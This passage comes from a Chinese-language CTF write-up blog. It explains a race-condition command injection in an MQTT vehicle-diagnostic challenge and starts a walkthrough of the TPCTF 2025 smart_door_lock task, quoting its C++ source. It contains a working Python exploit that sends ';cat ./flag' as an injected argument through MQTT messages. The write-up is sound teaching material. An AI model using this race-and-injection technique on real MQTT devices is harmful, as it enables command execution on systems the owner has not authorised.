src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-791\"  sizes=\"(max-width: 828px) 100vw, 828px\" \/><\/div><\/figure>\n\n\n\n<p>\u8ba4\u8bc1\u7684\u903b\u8f91\u5c31\u662f\u5c06\u63a5\u6536\u5230\u7684VIN\u7801\u8f6c\u6210\u5341\u516d\u8fdb\u5236\uff08\u5176\u5b9e\u5c31\u662f\u5728\u8003\u5bdfmqtt\u63a5\u53d7\u6570\u636e\uff09\uff0c\u4e0d\u591a\u8d58\u8ff0\u4e86<\/p>\n\n\n\n<p>\u968f\u540e\u6839\u636ecmd\u503c\uff0c\u53ef\u4ee5\u8c03\u7528set_vin\u547d\u4ee4<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-49-1024x687.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"687\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-49-1024x687.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-792\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u6709\u4e00\u4e2a\u5f88\u660e\u663e\u7684\u547d\u4ee4\u6ce8\u5165\uff0csrc\u5c31\u662f\u6211\u4eec\u521a\u624d\u7684arg\u53c2\u6570<\/p>\n\n\n\n<p>popen\u51fd\u6570\u4f1a\u6267\u884cs\u7684\u547d\u4ee4\uff0c\u7531\u4e8e\u662f\u201cr\u201d\u53c2\u6570\uff0c\u6240\u4ee5\u4ed6\u4f1a\u5c06\u547d\u4ee4\u6267\u884c\u7684\u7ed3\u679c\u4f20\u5165\u7ba1\u9053\uff0c\u5728fread\u7684\u65f6\u5019\u8bfb\u5230ptr+5\u7684\u4f4d\u7f6e\uff0c\u7136\u540e\u5229\u7528mqttsend\u51fd\u6570\u53d1\u9001\u7ed9broker<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-50-1024x596.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"596\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-50-1024x596.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-793\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f46\u662f\u6267\u884c\u547d\u4ee4\u4e4b\u524d\uff0c\u4f1a\u6709\u4e00\u4e2acheck\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u4e0d\u7ec6\u770b\u4e86\uff0c\u529f\u80fd\u5c31\u662f\u53ea\u5141\u8bb8\u547d\u4ee4\u4e2d\u6709\u6570\u5b57\u6216\u5b57\u6bcd\u51fa\u73b0\uff0c\u8fd9\u5c31\u5bfc\u81f4\u547d\u4ee4\u6ce8\u5165\u65e0\u6cd5\u8f93\u5165\u7b26\u53f7\u800c\u4e0d\u6210\u529f<\/p>\n\n\n\n<p>\u4f46\u662f\u7531\u4e8e\u68c0\u67e5\u5b8c\u4e4b\u540e\u5230\u6267\u884c\u547d\u4ee4\u4e4b\u524d\uff0c\u5b50\u8fdb\u7a0b\u4f1a\u6267\u884c\u4e00\u4e2asleep\uff082\uff09\u7684\u51fd\u6570\uff0c\u4e8e\u662f\u5728\u8fd9\u4e2a\u671f\u95f4\u6211\u4eec\u5c31\u53ef\u4ee5\u518d\u6b21\u53d1\u9001\u6d88\u606f\uff0c\u4fee\u6539arg\u4e3a\u547d\u4ee4\u6ce8\u5165\u7684\u53c2\u6570\uff0c\u8fd9\u5f53\u7136\u7ed5\u4e0d\u8fc7check\u7684\u68c0\u67e5\uff0c\u4f46\u662f\u5728\u4e0a\u4e00\u4e2a\u5b50\u8fdb\u7a0b\u4f11\u7720\u4e24\u79d2\u7ed3\u675f\u540e\uff0c\u6211\u4eec\u7684\u547d\u4ee4\u5df2\u7ecf\u88ab\u4fee\u6539\u4e86\uff0c\u4e8e\u662f\u5c31\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u6ce8\u5165\u4e86<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"exp\"><\/span>exp<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>#! \/usr\/bin\/python3\nimport random\nfrom pwn import *\nimport time\nimport paho.mqtt.client as mqtt\nimport json\ncontext(log_level = \"debug\",os = \"linux\",arch = \"amd64\")\npwnFile = \".\/pwn\"\nlibcFile = \".\/libc.so.6\"\nip = \"127.0.0.1\"\nlocal = \"\"\nlocal_port = 9999\nport = 9999\nelf = ELF(pwnFile)\nlibc = ELF(libcFile)\n\n\ndef publish(client,topic,auth,cmd,arg):\n    msg = {\n        \"auth\":auth,\n        \"cmd\":cmd,\n        \"arg\":arg\n    }\n    result = client.publish(topic = topic, payload = json.dumps(msg))\n    print(json.dumps(msg))\n    print(result)\n    return result\n\ndef on_connect(client, userdata, flags, rc):\n    client.subscribe(\"vehicle_diag\")\n    client.subscribe(\"diag\")\n    client.subscribe(\"#\")  # \u8ba2\u9605\u6240\u6709\n    client.subscribe(\"diag\/resp\")\n    print(\"Connected with result code \" + str(rc))\n\ndef on_subscribe(client,userdata,mid,granted_qos):\n    print(\"\u6d88\u606f\u53d1\u9001\u6210\u529f\")\n\ndef on_message(client, userdata, msg):\n    message = msg.payload.decode()# Decode message payload\n    print(f\"Received message on topic '{msg.topic}': {message}\")\n    # try:\n    #     data = json.loads(message)  # \u89e3\u6790\u4e3a\u5b57\u5178\n    #     dest = data.get(\"vin\")  # \u83b7\u53d6vin\u5b57\u6bb5\n    #     log.success(\"dest -&gt; \"+ dest)\n    # except json.JSONDecodeError:\n    #     print(\"JSON\u89e3\u6790\u5931\u8d25\")\n    print(message)\n\ndef sum2hex(dest):\n    v3 = 0\n    for i in range(len(dest)):\n        v3 = (0x1f  * v3 +  ord(dest&#91;i])) &amp; 0xffffffff\n    log.success(f\"sum2hex -&gt; {v3:08x}\")\n    return  f\"{v3:08x}\"\n\n\n\n#gdb.attach(io,'b *$rebase(0x1EC0)')\ntopic = \"diag\"\nclient = mqtt.Client()\n\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_subscribe = on_subscribe\nclient.connect(host = \"127.0.0.1\",port = 9999,keepalive=10000)\n\n\n\n\nauth = sum2hex(\"hahaha\\n\")#\u8fd9\u91cc\u662f\u4f60\u81ea\u5df1\u63a5\u6536\u5230\u7684VIN\u7801\n\npublish(client,\"diag\",auth,\"set_vin\",\"111111111111\")\nsleep(0.5)\npublish(client,\"diag\",auth,\"set_vin\",\";cat .\/flag\")\npublish(client,\"diag\",auth,\"set_vin\",\";cat .\/flag\")\nsleep(1)\n\nclient.loop_start()<\/code><\/pre>\n\n\n\n<p>\u6253\u901a\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-46-1024x490.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"490\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-46-1024x490.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-789\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"TPCTF%E2%80%94%E2%80%94smart-door-lock\"><\/span>TPCTF\u2014\u2014smart_door_lock<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u9898\u76ee\u5df2\u5f00\u6e90<a href=\"https:\/\/github.com\/tp-ctf\/TPCTF2025\/tree\/main\/pwn-smart-door-lock\">TPCTF2025\/pwn-smart-door-lock at main \u00b7 tp-ctf\/TPCTF2025 \u00b7 GitHub<\/a><\/p>\n\n\n\n<p>\u9898\u76ee\u9644\u4ef6\u662f\u62b9\u4e86\u7b26\u53f7\u8868\u7684\u9759\u6001\u7f16\u8bd1\uff0c\u603b\u4e4b\u5982\u679c\u8ba9\u6211\u6765\u76f4\u63a5\u9006\u5411\u8fd9\u4e2a\u7a0b\u5e8f\uff0c\u6211\u80fd\u9006\u4e00\u5e74\uff0c\u6240\u4ee5\u4ec5\u4ece\u590d\u73b0\u5b66\u4e60\u7684\u89d2\u5ea6\uff0c\u6211\u4eec\u5148\u6765\u5b66\u4e60\u6e90\u7801\uff0c\u5728\u5bf9\u5e94\u5230IDA\u91cc\u9006\u5411\u5427\uff0c\u4e0d\u5f97\u4e0d\u8bf4\u62b9\u4e86\u7b26\u53f7\u8868\u786e\u5b9e\u7ed9\u8fd9\u4e2a\u9898\u589e\u52a0\u4e86\u592a\u591a\u96be\u5ea6<\/p>\n\n\n\n<p>\u672c\u9898exp\u5b66\u4e60\u81ea<a href=\"https:\/\/mp.weixin.qq.com\/s\/NBsMAdLyNwvJ3WIV3vyvzg\">TPCTF 2025 Writeup by Nepnep<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E6%BA%90%E7%A0%81%E5%AD%A6%E4%B9%A0\"><\/span>\u6e90\u7801\u5b66\u4e60<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"maincpp\"><\/span>main.cpp<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-51-1024x493.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"493\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-51-1024x493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-800\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>main.cpp\u91cc\u6838\u5fc3\u5c31\u662f\u8c03\u7528\u4e86mqtt_lock\u8fd9\u4e2a\u51fd\u6570\uff0c\u5176\u4ed6\u7684\u90fd\u4e0d\u91cd\u8981\uff0c\u90fd\u662f\u521d\u59cb\u5316\u548c\u7ed3\u675f\u56de\u6536\u8d44\u6e90\u51fd\u6570\u7b49\u7b49\uff0c\u6211\u4eec\u4e0d\u591a\u5173\u6ce8\u4e86<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"door-lockh\"><\/span>door_lock.h<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"876\" height=\"459\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-801\"  sizes=\"(max-width: 876px) 100vw, 876px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u9762\u9996\u5148\u5b9a\u4e49\u4e86\u6307\u7eb9\u7ed3\u6784\u4f53\u548c\u95e8\u9501\u5f00\u5173\u72b6\u6001\u7ed3\u6784\u4f53\uff0c\u6307\u7eb9\u7ed3\u6784\u4f53\u5305\u542b\u6307\u7eb9\u4fe1\u606f\uff0c\u4e0b\u4e00\u4e2a\u6307\u9488\uff08\u5f88\u660e\u663e\u662f\u4e2a\u94fe\u8868\uff09\uff0c\u6307\u7eb9\u7684id\u548c\u91cd\u8bd5\u6b21\u6570\uff0c\u95e8\u9501\u72b6\u6001\u5b9a\u4e49\u4e86\u5f00\/\u5173\u4e24\u79cd\u72b6\u6001\u4ee5\u53ca\u64cd\u4f5c\u7684\u65f6\u95f4\u6233\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-53-1024x821.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"821\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-53-1024x821.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-802\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5176\u6b21\u5b9a\u4e49\u4e86mqtt_lock\u51fd\u6570\uff08\u6838\u5fc3\uff09\uff0c\u4ee5\u53ca\u5176\u4ed6\u4e00\u4e9bmqtt\u56de\u8c03\u51fd\u6570\uff0c\u8fd8\u6709\u6307\u7eb9\u94fe\u8868\uff08finger_list\uff09\uff0c\u4ee5\u53ca\u672c\u9898\u7684\u5173\u952e\u2014\u2014logger\u8fd9\u4e2a\u6587\u4ef6\uff0c\u8fd8\u6709\u5176\u4ed6\u82e5\u5e72\u51fd\u6570\u548c\u53c2\u6570\uff0c\u4e0d\u591a\u89e3\u91ca\u4e86\uff0c\u63a5\u4e0b\u6765\u7684\u51fd\u6570\u5206\u6790\u4f1a\u63d0\u5230<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"door-lockcpp\"><\/span>door_lock.cpp<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-54-1024x938.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"938\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-54-1024x938.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-803\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u662f\u4e00\u4e2a\u5904\u7406json\u6570\u636e\u7684\u8f85\u52a9\u51fd\u6570\uff0c\u5728\u8fd9\u4e2a\u9898\u4e2d\u4e0d\u6d89\u53ca\u6f0f\u6d1e\u548c\u6838\u5fc3\u903b\u8f91\uff0c\u4e0d\u591a\u5206\u6790\u4e86<\/p>\n\n\n\n<p>\u8d34AI\u7684\u89e3\u91ca<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-55-1024x460.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"460\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-55-1024x460.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-804\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-56-1024x376.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"376\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-56-1024x376.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-805\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u65f6\u95f4\u6233\uff0c\u4e0d\u591a\u8bf4<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-57-1024x1010.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"1010\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-57-1024x1010.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-806\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5927\u767d\u8bdd\u5c31\u662f\u628a\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u5f62\u5f0f\u7684\u6307\u7eb9\u6570\u636e\u63d0\u53d6\u6210int\u6570\u7ec4<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-66.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"543\" height=\"220\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-66.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-815\"  sizes=\"(max-width: 543px) 100vw, 543px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u9650\u5236\u4e86\u6307\u7eb9\u6570\u636e\u53ea\u80fd\u662f\u6570\u5b57\uff0c\u5982\u679c\u662f\u5176\u4ed6\u7684\uff0c\u6bd4\u5982\u5b57\u6bcd\uff0c\u5c31\u4f1a\u76f4\u63a5\u8fd4\u56de\u7a7a\u6307\u9488\uff0c\u8fd9\u91cc\u6bd4\u8f83\u91cd\u8981\uff0c\u540e\u9762\u8981\u8003\uff0c\u5212\u91cd\u70b9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mqtt_lock::mqtt_lock(const char *id, const char *host, int port) : mosqpp::mosquittopp(id)\n{\n    \/* set connection *\/\n\tint keepalive = 60;\n\ttls_opts_set(1,\"tlsv1\",NULL);\n\ttls_set(\"\/etc\/mosquitto\/certs\/ca.crt\",NULL,NULL,NULL,NULL);\n\ttls_insecure_set(true);\n\tconnect(host, port, keepalive);\n\n    \/* inital session &amp; token *\/\n    session_id = NULL;\n    auth_token = NULL;\n    \n    \/* set lock inital *\/\n    lock_door();\n    \/* open logger create read write *\/\n    strcpy(log_file,\"\/etc\/mosquitto\/smart_lock.log\");\n    logger = fopen(log_file, \"w+\");\n    if (logger == NULL) {\n        printf(\"Error opening file!\\n\");\n        exit(1);\n    }\n    int status = log(\"logger created:%s\\n\",log_file);\n\n    \/* read fingers *\/ \n    FILE* finger_file = fopen(\"\/etc\/mosquitto\/fingers_credit\",\"r\");\n    if (finger_file == NULL) {\n        printf(\"Error opening file!\\n\");\n        exit(1);\n    }\n    char line&#91;512];\n    fingers *finger_pos = NULL;\n    max_finger_id = 1;\n    while (fgets(line, sizeof(line), finger_file)) {\n        line&#91;strcspn(line, \"\\n\")] = 0;\n        struct fingers *new_finger = (struct fingers*)malloc(sizeof(struct fingers));\n        new_finger-&gt;finger_id = max_finger_id++;\n        new_finger-&gt;next = NULL;\n        new_finger-&gt;retry_count = 0;\n\n        if (new_finger == NULL) {\n            log(\"Error allocating memory!\\n\");\n            exit(1);\n        }\n        if (finger_list == NULL)\n        {\n            finger_list = new_finger;\n            finger_pos = new_finger;\n        } else {\n            finger_pos-&gt;next = new_finger;\n            finger_pos = new_finger;\n        }\n        if( edit_finger(new_finger,(char*)line)){\n            continue;\n        }\n        else {\n            free(new_finger);\n            continue;\n        }\n    }\n    fclose(finger_file);\n\n    \/* inital subscribe*\/\n    subscribe(NULL, \"auth_token\");\n    subscribe(NULL, \"manager\");\n    subscribe(NULL, \"logger\");\n};<\/code><\/pre>\n\n\n\n<p>\u6572\u91cd\u70b9\u4e86\uff01<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-58-1024x297.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"297\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-58-1024x297.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-807\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u9996\u5148\u521d\u59cb\u5316tls\u8bc1\u4e66\uff0csession_id,auth_token\uff0c\u548cmqtt\u7684\u670d\u52a1\u5668\uff08broker\uff09\u8fdb\u884c\u8fde\u63a5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-59.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"881\" height=\"387\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-59.png\" 